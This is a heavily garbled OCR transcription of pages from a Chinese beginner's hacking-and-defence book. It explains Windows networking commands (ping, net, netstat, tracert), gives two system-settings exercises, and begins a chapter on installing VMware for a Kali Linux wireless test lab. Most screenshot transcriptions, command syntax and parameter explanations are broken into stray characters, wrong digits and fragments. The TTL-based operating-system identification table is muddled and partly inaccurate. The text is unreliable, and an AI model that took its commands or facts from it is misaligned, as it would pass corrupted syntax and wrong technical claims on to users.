A \[Jser QA 由 近 生 " 癌 喇 YdiT c'\Vindows /a:h 
交 人 CE-CO0l 
-Windows 的 目录 


018/10/17/ 启 * 午 141: 白 <DIR> BitLockerDiscoyreryVyolumeContentE 
0197017147 “ 午 06:50 <DIR》 Installer 
018109715/ 周 六 下 午 03:33 <DIR> Language0yerlayCac 


2018y097157 周 六 攻 03:28 70 Windowsshell. ee t 
I 670 字 节 
3 小 目录 13, 211, 136, 000 奇 骨 字 节 


C:\Users\Administrator>s 


2.6.3 ”ping 命 令 


ping 命 令 是 TCP/IP 协 议 中 最 为 常用 的 
命令 之 一 ， 主 要 用 来 检查 网 络 是 否 通畅 或 
者 网 络 连接 的 速度 ， 作 为 一 个 黑客 来 说 ， 
ping 命 令 是 第 一 个 必须 掌握 的 DOS 命 令 。 在 
“命令 提示 符 ” 窗 口中 输入 ping /?， 可 以 得 
到 这 条 命令 的 帮助 信息 。 


一 等 王 品 . CAW - 一 
-| 管理 员 : CWindows\system32\cmd.exe 


JG crosoft Windows [版 10. 0. 17763. 104] A 
cy 2018 Microsoft Corpcration。 人 保留 记 有 权利 。 


C:\Users\Administrator>pins /9 
用 法 : ping [-t] [-a] [-n count] [-1 size] [-f] [-i TTL] [-w TOS] 
[-r count] [-s <ount] [[-j host-list] | [-k host-list]] 


[-w timeout] [-R] [-S srcaddr] [-c corpartment] [-p] 
[-4] [-6 target name 


-tt Ping rhe 请 键 六 Ctrl+EBreak; 


oe 


-] size 全 | 区 天 小。 

-Et ee 芽 后 中 发 “不 分 段 ” 标记 ( 仅 适 用 于 IPvd) 。 
-y T05 服务 类 型 ( 仅 适 用 于 IPv4。 该 设 弃 用 

| 时 六 计时 后 

ei 记录 计数 跃 点 的 路 由 ( 仅 适 用 于 IPvdg) 。 

-se count 计 关 跃 扣 的 肥 间 吉 四 从 于 IPwd). 

-j host-list 与 主机 可 i DR C 保 适时 于 IPvd) 。 


使 用 的 松 冯 
加 oe 机 全 和 1 上 a IPw4) 。 
-及 二 1 各 由 
yl 
加 


-3 srcaddr 攻 间 凤 拔 地址 


td = 
4 
C:\Users\Acministrator> 
使 用 ping 命 令 对 计算 机 的 连接 状态 进行 

测试 的 具体 操作 步骤 如 下 。 
使 用 ping 命 令 来 判断 计 算 机 的 操作 
系统 类 型 。 在 “命令 提示 符 ” 窗 口中 输 

入 “192.168.0.1” 命 令 ， 右 上 图 为 其 运行 
Ses 
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3 本 
fc] 2018 Microsoft Corporation。 保留 所 有 权利 。 


C:\Users\Adninistrator>ping 192. 158.0.1 
| 


| 时 Ping 192. 168. 0. 二 记 梁 32 字 节 的 数据 : 


192. 168. 0. 1 的 加 字 字 =32 a lms TTL=64 
. 168. 0. :2 l=1ms TTL=64 
: 字 太 -32 时 间 =lms TTL=64 

: 字 节 =32 果 | 且 =lms TTL=64 


192. 168.0.1 的 了 st 并 寺 失 (0% 丢失 )， 
4 = 0 (DO% 

i 党 秒 为 单 各 

平和 -im 


5C: :MUsersdministrator>e 


192.168.0.1 -t -1 128 命 令 ， 
主机 发 出 大 量 的 数据 包 ， 如 下 图 所 示 。 


Microsoft Windows [A 10.0, 17763. -20 A 
Co) 2018 Ji crosoft Corporation。 怪 留 所 有 权利 。 


MUsersAAdministrator>pins 192. 168,0.1 -+t -1 128 


DO 
~ Ps 
旧 遇 员 
Lo | Lo | 
er pe pe 
Teme 
Gy> [md 
忆 及 不 


一 -一 -一 -一 -一 -一 -一 -一 -一 -一 -一 -一 
| COI DI DDI DID < 

1 | AN 

和 ea ja ma ja et ja et ja et | 一 < 


吾 加 吾 盏 吾 百 吾 百 百 吾 百 ; 


所 下 
IIDIDOUIIDDOIDIITI: 
下 上 


NI 
加 
pa | 
[my 
1 
(ap 
让 


计算 机 是 否 与 外 界 网 络 连 


判断 本 台 
本 在 “命令 提示 符 ” 窗 口中 输入 ping www. 


baidu.com 命 令 ， 下 图 为 其 运行 结果 ， 说 明 本 


台 计 算 机 与 外 界 网 络 连 通 


Jicrosoft Windows Li 本 10.0.17763. 104 ~ 
(ce) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


村 ‘Users\AdministratorYpine ww. baidu, com 

正在 .a, shi fen, com [220. 181, 119 244] 具有 32 字 节 的 数据 : 
< 自 220. -181 112.244 的 回 : 字 宙 = =5 L=55 
自 220. 181. 112. 244 的 回 受 : 字 节 =32 时 | 四 = -Br TIL BS 

来 目 220. 181. 112. 244 的 回复 : 字 节 =32 时 器 =656ms TTL=55 

220. 181, 112. 244 的 回 豆 : ia] =B5ms TTL=55 

220. 181. 112. 244 骸 Pin Ping 统计 信 , 


i 于 先 = 0 【0% 于 先 )， 
返 Bia Cb ) 
入 和 和 i ee 


C'\Users\Administrator>s 
| 


解析 某 IP 地 址 的 计算 机 名 。 在 “ 命 
pe 符 ” 窗 口中 输入 ping -a 192.168.1. 
102 合 令 ， 下 图 为 其 运行 结果 ， 这 人 台 主 
机 的 名 称 为 “SC-201811151232.DHCP 
HOST” 。 


3 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


本 10. 
lc 2018 Nie a 和 保留 所 有 权利 。 
:\Users\Administratoryping -a 192. 168.0. 143 


: 201811151232. DHCP HDST [192. 168.0. 143] 有 具有 32 字 节 的 数据 : 
E 自 192. 168.0. 143 的 目 得 : 宁 节 =32 中 TTL=128 
目 192. 163.0. 143 : =3 


正直 Ping SC- 

< 目 192. 163.0. 143 的 回 夏 : 字 节 =32 时 间 clme TTL=128 

192. 168. 0. 143 的 Ping # 统 赴 信介: 4 
六 党 闫 


往返 的 告 生 闪 间 ( 必 各 和 hy]: Ee 
人 


0 【0% 丢失 )， 


C:\Users\Administrator> 


(Cons 


利用 TTL 值 判断 操作 系统 类 型 
由 于 不 同 的 操作 系统 的 主机 设置 的 
TTL 值 是 不 同 的 ， 所 以 可 以 根据 TTL 值 来 
识别 操作 系统 类 型 。 在 一 般 情况 下 : 
e@ TTL=32 则 认为 目标 主机 操作 系统 为 
Windows 95/98。 
e@ TTL=64-128 就 认为 主机 操作 系统 为 
Windows NT/2000/XP/7/10。 
e@ TTL=128-255 或 者 32-64 就 认为 主机 
操作 系统 是 UNIX/Linux 操 作 系 统 。 


net 命 令 


使 用 net 命 令 可 以 查询 网 络 状 态 、 共 享 
资源 以 及 计算 机 所 开启 的 服务 等 ， 该 命令 
的 语法 格式 信息 如 下 : 

NET [ ACCOUNTS | COMPUTER | CONFIG | 
CONTINUE | FILE | GROUP | HELP | 

HELPMSG | LOCALGROUP | 
PAUSE | PRINT | SEND | SESSION | 


SHARE | START | STATISTICS | STOP 
| TIME | USE | USER | VIEW | 


查询 本 台 计 算 机 开启 那些 Windows 服 务 
的 具体 操作 步骤 如 下 。 
使 用 net 命 令 查看 网 络 状态 。 打 开 
“命令 提示 符 ” 窗 口 ， 在 命令 行 下 输入 net 
start 命 令 ， 如 下 图 所 示 。 


NAME | 


10.0. 17753. 104] ^~ 
Ce) 2018 Microsoft ome on 保留 所 有 权利 。 


icrosoft Windows [hf 


Cc:\Users\Administrator>net starte 


按 Enter 键 ， 则 可 以 在 打开 的 “命令 提 
ee ”窗口 中 显示 计算 机 所 启动 的 Windows 
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服务 ， 如 下 图 所 示 。 


\cmd.exe 


oft Win pe 10. 0. 17763. 104] 和 
必 作 2018 tt Corporation., 悍 留 所 有 权 逢 。 


名 Maere duinistrator snet start 


经 启动 以 下 好 ndows 服务 : 


BdaptiveSsleepService 

上 ID External Events Utility 
END FUEL Service 
Application Intorrmation 
ApPX Deployment Service (AppXSVC) 
Background Tasks Infrastructure Service 
Base Filtering Ensine 
cbdhsvc_p0bf2 

CDPUsersve_5Obf2 

CNG Key Tsolation 

CONM+ Event System 

Computer Browser 

Corellessaging 

Credential Manager 

Cryptographic Services 

DCONM Server Process Launcher 
Device Association Service 

DHCP Client 

DNS Client 

Flash Helper Service 

Function Discovery Provider Host 


2.6.5 netstat 命令 


netstat 命 令 主 要 用 来 显示 网 络 连接 的 信 
息 ， 包 括 显示 活动 的 TCP 连 接 、 路 由 器 和 网 
络 接口 信息 ， 是 一 个 监控 TCP/IP 网 络 非常 
有 用 的 工具 ， 可 以 让 用 户 得 知 系统 中 目前 
都 有 哪些 网 络 连接 正常 。 

在 “命令 提示 符 ” 窗 口中 输入 netstat 
/2?， 可 以 得 到 这 条 命令 的 帮助 信息 。 


icra ndows [ia L 四 1 6 六 10 入 
(c) 2 mic rosoft Corboratian。 保 留 所 有 从 利 。 


Fi\Usecs\Ab aistra lur stak /9 
屁 示 协议 统计 导 息 和 当前 TCPAIP 网 络 连接 。 
IETSTAT [-a] [ 0 


-a 时 
十 
pb 


-=s)] [-x] [-t] [interval] 


[让 


J 


Te 二 


祈 
一 


-2 


cecil nell 
人 二 人 


和 | 中 | 


”0 
了 proto 


总 王 导 周 


~ DP、 TICpv5 或 了 如 果 与 - 
打下 i 克 的 统计 信息 ，prote 是 人 史 作 和 一 Fs 
TcP、TCPv6、1DP 或 LE 


< 冲 和 a 口 


本 | 


4 


议 的 统计 信息 。 默认 情况 下 . ER 
i Re 小 、 TeP、TCPyr6、UDP 和 UDP*6 的 统计 信息 
和 


和 Netwarip ;证 接 、 仁 昨 缉 和 共 闻 


I 


扶 的 
地 选项 引 
Te 的 人生， 吝 未 同音 人 的 
0 - 吉 果 省 晤 ， 史上 nototas “将 打印 当前 的 


该 命令 的 语法 格式 信息 如 下 : 


NETSTAT [-a] [-b] 
Breotolnit= emi =sI [Em 


其 中 比较 重要 的 参数 含义 如 下 : 

e -a: 显示 所 有 连接 和 监听 端口 。 

以 数字 形式 显示 地 址 和 端口 号 。 
使 用 netstat 命 令 查 看 网 络 连接 的 具体 步 


a EDD omni 亲生 与 泛 到 和 印 区 
各 


可 击 


ee a op 


[intervall 


@ -nn: 


wasp 


打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
了 _n 或 netstat 命 令 ， 按 Enter 键 ， 即 可 查 
活动 的 TCP/IP 连 接 ， 如 下 图 所 示 。 


看 服务 器 


Microsott Vindows 10.0. 17763. 104] ~ 


step 四 在 “命令 提示 符 ” [Sg 
rp 按 Enter 键 ， 即 可 查看 本 机 路 由 信息 
内 容 ， 如 下 图 所 示 。 


(c) 2018 Microsoft Corparation。 保留 所 有 权利 。 


:VUsers\Aoninistralor elstal -r 


向 口 


蚁 口 列 表 


3...00 ff #6 bhbO d9 dh ..... 
5...00 25 22 £9 5f 44 ...... Reasltek PCIe (PE Fanily Centroller 
Softmre Loopback Jnterface 1 


. TAP-Wndewe Adaptar V9 


(fc) 2018 Microsoft Corporation。 怀 留 所 有 权利 
C:\Users\Administratcr>netstat 
活动 连接 
协议 ”本地 地 站 外 部 地 址 状态 
TCP 127. 0. 0.1 activate:49778 ESTABLISHED 
TCP 127. 0. D. 1:49676 activate :49577 ESTABLISHED 
TCP 127.0. 0. 1:49677 activate:49676 ESTABLISHED 
TCP 127. 0. 0. 1:49778 activate:21503 ESTABLISHETD 
TCP 192. 168B. 0, 143:49928 180. 101. 139, 92 :http CLOSE_¥AIT 
TCP 192. 168. 0. 143:49929 180. 101. 139, 92 :http CLOSE_VaAIT 
TCP 192. 168. 0. 143:50772 52. 230. 3. 194:https ESTABLISHED 
TCP 192. 168. 0. 143:50971 113. 96.208. 106:http ESTABLISHED 
[| 


中 输入 netstat 一 


IPz 和 4 足 由 友 
网 给 旺 村 网 络 擅 码 网 关 扶 口 点 数 
0.0.0.0 0,0.0.0 192, 163.0, 1 192, 163.0, 143 35 
127,0.0,0 255, 0, 0.0 迹 127.0.01 331 
127.0.0, 1 255. 255. 255, 255 127.0.01 331 
127, 255, 255. 255 255. 255, 255, 255 周折 127.0.0.1 331 
192. 168.0.0 255. 255. 255.0 : 192 163.0.143 291 
192. 168. 0. 143 255.255, 255, 255 和 192. 163.0.143 291 
192 168. 0 255 255. 255. 255. 255 192 163 0.143 2091 
224.0.0.0 240.0.4.0 革 127. 0. 0. 1 331 
224.00.0 40.0.0.0 192 168.0.143 2%91 
255. 255. 255. 255 255.255. 255. 255 在 全 127.0.0.1 331 
255. 255. 55. 255 255. 9255. 255. 255 仁 轩 3 197. I6% 0. 143 29] 
kK 路 由 
无 
IPz6 足 由 去 
Veigas 
口 跨 点数 网 络 日 标 
331 ::1/129 
5 291 1e80::/64 村 
5 291 fa90: :al3c:88dl1:702a: 1 
1 331 fz00::/8 二 
5 291 £100::/8 在 饮品 上 
“ 义 路 由 
= 


在 “命令 提示 符 ” 窗 口中 输入 netstat 一 
和 按 Enter 键 ， 即 可 查看 本 机 所 有 活动 
的 TCP/IP 连 接 ， 如 下 图 所 示 。 


口 
A 

(ce) 2018 Nicrosoft re 仔 留 所 有 检 乔 。 

[ADsersWAaministratcor>netstat -a 

活动 连 拱 
协议 ”本 地 地 址 外 部 地 址 状态 
TCP 0.0.0.0:135 SC-201811151232:0 LISTRENING 
TOP 0.0.0.0:443 sc-201911151232:0 LISTENING 
TCP 0.0.0.0:445 SC-2019811151232:0 LISTENING 
TOP 0. 0. 0.0:902 sc-201811151232:0 LISTENING 
TCP 0. 0.0.0:912 sc-201811151232:0 LILSTENING 
TCP 0. 0. 0. 0:3306 sc-201811151232:0 LISTENING 
ICP 0. 0. 0.0:S5040 sc-201811151232:0 LISTENING 
TCP 0.0.0.0:5357 sc-201811151232:0 LILSTENING 
TCP 0. 0.0.0:7909 sc-201811151232:0 LILSTENING 
ICP 0.0.0.0:10143 sc-201811151]232:0 LISTENING 
TOP 0.0. 0. 0:33060 sc-201811151232:0 LISTENING 
TCP 0. 0U.D.D:d49664 sc-201811151232:0 LISTENING 
TCP 0. 0. 0. 0:49665 SC-20181115123230 LISTENING 
TCP DO. 0. 0. 0: 49666 sc-201811151232:0 LILSTENING 
TCP 0. 0. 0.0:496567 SC-2018111512323:0 LI5ITENINC 
TCP 0. 0. 0.0:49669 sc-201811151]232:0 LISTENING 
TuP 0. 0. 0.0:49673 sc-201811151232:0 LLSTENING 
TeP 0.0.0.0:49698 5c-201811151232:0 LISTENING 
TeP 127.0.0. 1:5037 sc-201811151232:0 LISTENING 
TeP 127.0.0. 1:8307 SC-201811151232:0 LISTENING 
TeP 127.0.0.1:21440 5c-201811151232:0 LISTENING 
TeP 127.0.0.1:21441 sc-201811151232:;0 LISTENING 
TeP 127.0.0. 1:21501 3c-201811151232:0 LISTENING 
TeP 127. 0.0. 1:21508 5c-201811151232:0 LISTENING 
TCP 127.0.0. 1:21508 activate:d977?8 ESTABLISHED 
TeP 127.0.0.1:28317 sc-201811151232:0 LISTENING 
TP 127.0.0. 1:49676 activate: 49677 ESTABLISHED 
TeP 127.0.0.1:49677 activate:d9676 ESTABLISHED 
TeP 127.0.0. 1:49778 activate:21503 ESTABLISHED 
TP 192. 168.0. 143; 139 sc-201811151232:0 LISTENINGE 
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在 “命令 提示 符 ” 窗 口中 输入 netstat 
一 卫 -a 命令 ， 按 Enter 键 ， Bp 可 显示 本 机 所 有 
连接 的 端 肖 DD 及 其 状态 iv 9 如 下 图 所 示 o 


\Windows\system32\cmd.exe 一 口 
Le 


icrosoft Yindows LU 本 


《cj 2018 Wicrosoft Corporation, 保 所 有 权 刑 。 

Cb:\Users\Administratornetstat -~ -a 

活动 连接 
协议 ”本 地 地 址 外 部 地 址 状态 
TCP 0. 0. 9.0:135 0.0.0.0:0 LISTENING 
TCP D0. 0D.0.0:443 D0.0.0.0:0 LISTENING 
TeP D0. 0, .0D ;445 0.0.0,0:;0 LISTENING 
TeP 0. 0, V. 0:902 0. 0.0,V:0 LILSTENING 
TcP 0.0.9.0:912 0.0.0,0:0 LISTENING 
Teep 0.0.0.0:3306 0.0.0.0:0 LISTENING 
TeP 0. 0, V0. 0;5040 0. 0. 0, 0;0 LISTENING 
TCP 0. 0., 9.0:5357 0.0.0.0:0 LISTENING 
TJCP 0.0.0.0:7909 0.0.0.0:0 LISTENING 
TeP D0. 0, 0, 0;10143 0. 0, 0, 0:D LISTENING 
TCP 0. 0, 9. 0;33060 0.0.0,0:0 LISTENING 
TcP 0. 0. 0. 0: 49664 0.0.0,0:0 LISTENING 
Tep D0. 0. 0. 0:9665 0.0.0.0:0 LISTENING 
TeP 0, 0, V. 0; 49666 0. 0. 0, 0:0 LISTENING 
TCP 0. 0, 09. 0:49667 0.0.0.0:0 LISTENING 
TJCP 0.D0.D0.0D:349669 0.0.0.0:0 LISTENING 
TeP D0, 0, 0, 0; 49673 0. 0. 0, 0:0 LISTENING 
TeP 0. 0. 9. 0;49693 0.0.0.0:0 LISTENING 
TCP 127. 0. 0. 1:5037 0.0.0.0:0 LISTENING 
TP 127,0.0. 1:8307 0.0.0,0:;0 LISTENING v 


2.6.6 tracert 命 令 


使 用 tracert 命 令 可 以 查看 网 络 中 路 由 
节点 信息 ， 最 常见 的 使 用 方法 是 在 tracert 命 
令 后 追加 一 个 参数 ， 表 示 检 测 和 查看 连接 
当前 主机 经 历 了 哪些 路 由 节点 ， 适 合用 于 
大 型 网 络 的 测试 ， 该 命令 的 语法 格式 信息 
如 下 : 


tracert [-d] [-h MaximumHops] 


Hostlist] [-w Timeoutl] 


i= 
[TargetNamel] 


其 中 各 个 参数 的 含义 如 下 : 
e -d: 防止 解析 目标 主机 的 名 字 ， 可 
以 加 速 显 示 tracert 命 令 结 果 。 
e -h MaximumHops: 指定 搜索 到 目标 
地 址 的 最 大 跳跃 数 ， 默 认 值 为 30 个 
跳跃 点 。 
e -j Hostlist: 按照 主机 列表 中 的 地 址 
释放 源 路 由 。 
e -w Timeout: 指定 超时 时 间 间 隔 ， 默 
认 单 位 为 ms。 
e TargetName: 指定 目标 计算 机 。 
例如 : 如 果 想 查看 www.baidu.com 的 
路 由 与 局 域 网 络 连接 情况 ， 则 在 “命令 提 
示 符 ”窗口 中 输入 tracert www.baidu.com 
命令 ， 按 Enter 键 ， 下 图 为 其 显示 结果 。 
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黑客 攻防 与 无 线 妥 全 从 新 手 到 高 手 〈《 超 值 版 ) 


加 过 最 多 30 个 路 点 跟踪 

Fl wy a, ehifen. com [220. 181. 112. 244] 的 路 由 : 
<1 量 种 192. 169.0.1 
0 ms 172. 16.0.1 


222. 83. 34. 121 
222. 83. 40. 233 


1 
2 
3 
一 
5 
6 
了 
9 
9 


‘Users\hdrinistrator> 


2.7 ”实战 演练 
实战 演练 1 一 一 显示 文件 的 后 绎 扩展 名 


Windows 10 系 统 默认 情况 下 并 不 显示 
文件 的 扩展 名 ， 用 户 可 以 通过 设置 显示 文 
件 的 扩展 名 。 有 具体 操作 步骤 如 下 。 

单 击 “ 开 始 ” 按 钮 ， 在 弹出 快捷 菜 
单 中 选择 “文件 资源 管理 器 ”选项 ， 打 开 
“文件 资源 管理 器 ”窗口 ， 如 下 图 所 示 。 


ci 口 x 
@ 
Y | 总 沪 实 局 速 p 
内 
“ 军用 文件 去 (8) 
点 百 
各 
下 载 
及 此 研 蔽 
人 
ste FE i 
新 手 学 电脑 从 入 门 马 | 村 通 ( W 二 = 此 了 后 
但 DOn=sDrv= 人 
时 此 专访 = Ht 
枚 视 癌 
司 | 加 上 2016 
到 文档 ES 此 记 注 \ 点 面 
业 下 或 
日 [本 


选择 “查看 ”选项 卡 ， 在 打开 的 功能 
区 域 中 选中 “显示 /隐藏 ”区 域 的 “文件 扩 
展 名 ” 复 选 框 ， 如 下 图 所 示 。 


可 寺 成 a 
”新 手 字 昌 邯 欠 入 门 到 酌 运 ( ES 此 也 了 


{各 OneDrve 
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[step 图 此 时 打开 一 个 文件 夹 ， 用 户 便 可 以 查 
看 到 文件 的 扩展 名 ， 如 下 图 所 示 。 


并 快速 消 问 名 条 - 赵 改 日 革 
| | Tencent Files 

门 自 定义 Office 档 板 
El ipmsg.log 


2016/1/14 11:22 
2016/1/6 17:34 
2016/1/9 12:08 


站 新手 学 所 脑 从 入 门 到 桂 通 【V 


(入 OneDrive 


3 个 项 目 《这 中 1 个 项 目 340 六 他 所 了 国 


实战 演练 2 一 一 关闭 开机 多 余 启动 项 目 
在 计算 机 局 动 的 过 程 中 ， 目 动 运行 的 

程序 叫 作 开机 局 动 项 ， 有 时 一 些 木马 病毒 

程序 会 在 开机 时 就 运行 ， 用 户 可 以 通过 关 

闭 开机 启动 项 目 来 提高 系统 安全 。 
具体 的 操作 步骤 如 下 。 

按键 盘 上 的 Ctrl+Alt+tDel 组 合 键 ， 打 

开 “ 任 务 管理 器 ”界面 ， 如 下 图 所 示 。 


单 击 “ 任 务 管 理 器 ”选项 ， 打 开 “ 任 
务 管理 器 ”窗口 ， 如 下 图 所 示 。 


同伴 和 管理 器 一 口 x 
文件 由 ”选项 [O) ” 坦 看 (W) 
进程 ”性 能 应 用 历 雪 记录 ”启动 ”月 户 ” 详细 信息 服务 


站 11% 58% 0% 0% 

名 称 CPU 内 存 伪 习 网 络 
应 用 (4) 
” 各 350 支 全 浏览 器 0 Mbps 
Microsoft Word D Mbps 

忌 Windows 资源 千 理 恬 (3) 0 Mbps 
” 时 任 条 管理 器 0 Mbps 


后 台 进 程 (41) 
隐 360 安 全 剂 放生 
息 350 去 全 浏览 器 
居 360 安 全 浏 | 点 强 
辱 3260 安全 浏 [和 具 澡 
_€ 3650 安 全 浏览 器 


(人 ~) 简 喀 信息 (D) 结束 任务 (日 


选择 “启动 ”选项 卡 ， 进 入 “启动 ” 
界面 ， 在 其 中 可 以 看 到 系统 当中 的 已 启用 
启动 项 列表 ， 如 下 图 所 示 。 


了 任务 管理 闭 一 口 xX 
文件 (月 ”选项 (O) ”这 看 (V) 
进程 性 能 应 用 历史 记录 局 动 用 户 详细 信息 服务 


八 


名 称 发 布 者 状态 居 动 影响 
转 360 安 全 卫士 安全 防护 中 心 .。 360.cn 已 启用 高 
到 Brindicator Brother Industries, Ltd， 已 启用 = 
有 通 CTF 加 工程 序 Micrcsoft Corporation ”已 启用 低 
拘 Microsoft OneDrive Micrcsoft Corporation 已 启用 高 
Status Monitor Application Brother Industries, Ltd， 已 启用 二 


^) 简略 信息 (D) 禁用 (A) 


选择 开机 启动 项 列表 框 中 需要 禁用 的 
启动 项 ， 单 击 “ 禁 用 ”按钮 ， 即 可 禁用 该 
启动 项 ， 如 下 图 所 示 。 


2.8 


第 2 章 


| 任务 管理 器 一 口 xX 


文件 (F) ”选项 (O) 前 看 (V) 
进程 ”性 能 应 用 历史 记录 启动 ”用户 详细 信息 服务 


名 称 | 发 布 者 状态 启动 影响 
”起 360 去 全 卫士 安全 防护 中 心 .。 360.cn 已 启用 高 
强 Brindicator Brother Industries, Ltd， 已 启用 = 
万 CTF 加 吉 令 序 Microsoft Corporation 。 已 启用 低 
本 Microsoft OneDrive Microsof Corporation ”已 禁用 高 
Status Monitor Application Brother Industries, Ltd， 已 启用 


内 
YY 


LO 简略 信息 (D) 刻 用 (N) 


小 试 身 手 


练习 1: 查询 IP 地 址 。 
练习 2: 查看 系统 开放 的 端口 。 
练习 3: 黑客 常用 攻击 命令 演练 。 


P| 


无 线 网 络 攻防 必 备 知识 一。 


第 3 音 ”搭建 无 线 测试 系统 


Kalli Linux 


无 线 技术 在 给 人 们 市 来 极 大 方便 的 同时 ， 也 市 来 了 极 大 的 信 ， 


息 安 全 风险 。 在 目前 ， 无 


论 是 企 事业 单位 还 是 家 庭 用 户 ， 安 全 意识 依然 薄弱 。 本 章 介绍 无 线 测试 系统 环境 的 搭建 ， 
主要 内 容 包 括 安 装 与 创建 虚拟 机 、 安 装 与 更 新 Kali Linux 操 作 系统 、 安 装 CDlinux 系 统 、 安 


装 与 使 用 靶 机 等 。 


3.1 安装 与 创建 虚拟 机 


对 于 无 线 安 全 初学 者 ， 使 用 虚拟 机 构建 
无 线 测试 环境 是 一 个 非常 好 的 选择 ， 这 样 既 
可 以 快速 搭建 测试 环境 ， 同 时 还 可 以 快速 还 
原 之 前 快照 ， 避 免 错误 操作 造成 系统 骨 演 。 


下 载 虚 拟 机 软件 
虚拟 机 使 用 之 前 ， 需 要 从 官网 下 载 虚拟 


”机 软件 vmware， 具 体 的 操作 步骤 如 下 ; 


使 用 浏览 器 打开 虚拟 机 官方 网 站 


https://my.vmware.com/cn， 进 入 虚拟 机 官网 
页 面 ， 如 下 图 所 示 。 


IMY NWare 


后 ， ev 
= 品 ” 选 项 卡 ， 如 下 图 所 示 。 


所 有 下 载 


我 的 产品 产品 列表 CA 到 Zz) 


在 下 拉 页 面 找到 VMware Workstation 


Pro 对 应 选项 ， 单 击 右 侧 的 “查看 下 载 组 
件 ” 超 链接 ， 如 下 图 所 示 。 

查 震 性 1 驱动 程序 和 工 且 
进入 VMware 下 载 页 面 ， 在 其 中 选择 


Windows 版 本 ， 单 击 右 侧 “ 转 至 下 载 ” 超 链 
接 ， 如 下 图 所 示 。 


VMware Workstation Pro 


YY VMware Workstation Pro 14.13 for Windows 


VMware Workstation 14.1.3 Pro for VVindows 2018-08-14 转 至 下 载 


¥ VMware Workstation Pro 14.1.3 for Linux 


VMMwarc Work 二 至 下 乾 


5 凌 桂 至 下 载 页 面 ， ， “立即 下 载 ” 
et 如 下 图 所 示 。 


| a | 让 :对 又 动 竹 序 和 工 愉 开源 代码 EEX'ISO 


文件 信息 


This Workstation product installation includes VMware 
Tools for Windows 64-bit operating systems. 

文件 太 小 : 487.09 MB 

rt eo 


ei rm 
了 部 更 多 信息 


3.1.2 ”安装 虚拟 机 软件 


虚拟 机 软件 下 载 完 成 后 ， 接 下 来 
就 可 以 安装 虚拟 机 软件 了 ， 这 里 下 载 
的 是 目前 最 新 版 本 “VMware-worksta- 
tion-full-14.1.2-9474260.exe”， 用 户 可 根据 
实际 情况 选择 当前 最 新 版 本 下 载 即 可 ， 安 
装 虚 拟 机 的 具体 操作 步骤 如 下 : 
双击 下 载 的 VMware 安装 软件 ， 进 入 

“欢迎 使 用 VMware Workstation Pro” 寄 


口 ， 如 下 图 所 示 。 


尖 VMware Workstation Pro 安装 - XxX 
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WORKSTATION | , 
PR \ 站 吝 人 0 


欢 椰 使 用 VMware Workstation Pro 安装 向 导 


版 权 所 有 1998-2018 VMware, Inc. 保留 所 有 权利 。 本 产品 
受 美国 和 国际 版 权 及 知识 产 要 法 保护 。 VMware 产品 获得 
以 下 站 中 列 出 的 一 项 或 多 项 专利 : 


http: //www ,vmy 


[step 较 单 击 “ 下 一 步 ” 按 钮 进入 “最 终 用 
户 许可 协议 ”窗口 ， 选 中 “我 接收 许可 志 
议 中 的 条 款 ” 复 选 框 ， 如 下 图 所 示 。 


攻 VMware Workstation pro 去 装 XxX 


最 作用 户 许可 协议 
请 仔细 阅读 以 下 许可 协议 。 


VMWARE 最 终 用 户 许可 协议 


请 注意 ， 在 本 软件 的 安装 过 程 中 无 论 可 能 会 出 现任 何 条 款 ， 
使 用 本 软件 者 将 受 此 最 终 用 户 许 可 协议 各 条 款 的 约束 。 


重要 信息 ， 请 仔细 阅读 ， 您 一 旦 下 载 、 安 装 或 使 用 本 软件 ， 
您 【自然 人 或 法 人 ) 即 同意 接受 本 最 终 用 户 许可 协议 〈《“ 本 
协议 ”) 的 约束 。 如 果 您 个 同意 本 协议 的 条 款 ， 请 甸 卜 载 、 
安装 或 使 用 本 软件 ， 和 您 必须 删除 本 软件 ， 台 在 三 十 380) 天 _v 


回 我 接受 许可 协 说 中 的 条 款 (及 


| 打 EFp(P) 


| 上 一 步 B) |[ 下 一 步 My ] | 取消 | 


单 击 “下 一 步 ” 按 钮 ， 进 入 “ 自 定义 
a 3 口 ， 在 其 中 可 以 更 改 安装 路 径 也 
可 以 保持 上 默认， 如 下 图 所 示 。 


揭 VMware Workstation Pro 安装 一 xX 
自 定义 安装 
选择 安装 目标 及 任何 其 他 功能 。 
安装 位 置 : 
D:\Program Files (x88)\VMware\ 更 改 ... 


口 ] 增强 型 键盘 驱动 程序 (需要 重新 引导 以 使 用 此 功能 但) 
此 功能 要 求 主机 驱动 器 上 有 具有 10MB 空间 。 


上 = 步 @ 取消 


单 击 “ 下 一 步 ” 按钮 ， 进 入 “用 户 体 
及 置 ? 窗口 ， 这 里 采用 系统 默认 设置 ， 
如 右上 图 所 示 。 


第 3 章 ，” 搭建 无 线 测试 系统 Kali LinuXx 二 


由 VMware Workstation Pro 安装 一 X 


用 户 体验 设置 
编辑 默认 设置 以 提高 您 的 用 户 体验 。 


加 台 吉 检查 产品 更 新 () 
Workstation Pro 启动 时 ， 检 查 应 用 程序 和 已 安装 软件 组 件 是 否 有 


过 加 入 VMware 客户 体验 改进 计划 O) 


VMware 客户 体验 提升 计划 (CEIP) 将 向 VMware 提供 相 ^ 
关 人 信息， 以 帮助 VMware 改进 产品 和 服务 、 解 决 问 

题 、 并 向 您 建议 如 何以 最 佳 方式 部 署 和 使 用 我 们 的 产 
品 。 作 为 CEIP 的 一 部 分 ，VMware 会 定期 收集 和 您 所 


持 有 的 VMware 密 钥 相关 的 使 用 VMware 产品 和 服务 的 v 
了 解 更 多 信息 


上 一 步 @) 取消 


Ce “下 一 步 ” 按 钮 ， 进 入 “快捷 

口 ， 在 其 中 可 以 创建 用 户 快 捷 
方式 ， 这 里 可 以 保持 默认 设置 ， 如 下 图 
所 示 。 


捧 VMware Workstation Pro 去 装 X 
快捷 方式 
选择 您 要 放 入 系统 的 快捷 方式 。 


在 以 下 位 置 创建 YMware Workstation Pro 的 快捷 方式 : 
名 桌面 人 D) 
名 开始 菜单 程序 文件 夹 (5) 


_ 上 一 步 6) [下 - 步 |] 取消 


[step 圈 单 击 “ 下 一 步 ” 按 钮 ， 进 入 “已 准备 
好 安装 VMware workstation Pro” 页 面 ， 开 
始 准备 安装 虚拟 机 软件 ， 如 下 图 所 示 。 


臣 VMware Workstation pro 安装 一 X 


二 。 单 击 ` 上 一 步 查看 或 更 改 任何 安装 设置 。 单 击 ` 取 消退 出 向 


